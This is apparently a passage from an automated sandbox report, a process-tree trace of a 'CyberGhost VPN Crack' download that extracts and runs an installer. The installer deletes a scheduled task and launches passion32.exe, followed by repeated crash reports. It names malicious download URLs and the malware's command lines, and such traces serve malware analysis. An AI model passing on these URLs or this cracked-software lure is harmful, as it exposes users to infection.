PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3348 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 3348 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5264 wrote to memory of 4420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://t.co/f017Vqildt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae238ab58,0x7ffae238ab68,0x7ffae238ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3060 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4524 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3320 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4540 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://soneremonasez.shop/27844da3c568ad0171b0215c3223d7c0FW66Ze6GvDRWkFZlAckACzBeIowWpJM2HZo

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad0c346f8,0x7ffad0c34708,0x7ffad0c34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5264 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\" -spe -an -ai#7zMap3561:124:7zEvent11950

C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe

"C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe"

C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp

"C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp" /SL5="$5030E,5745945,56832,C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Passion_6102"

C:\Users\Admin\AppData\Local\Passion\passion32.exe

"C:\Users\Admin\AppData\Local\Passion\passion32.exe" cf34ff7a0074950a252e1460aab4eb7e

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1160

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/CyberGhost-VPN-7.2.4294-Crack-Full-Torrent-Premium-2019-Free!.zip

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffad0c346f8,0x7ffad0c34708,0x7ffad0c34718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1988

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1780

C:\Windows\SysWOW64\WerFault.exe

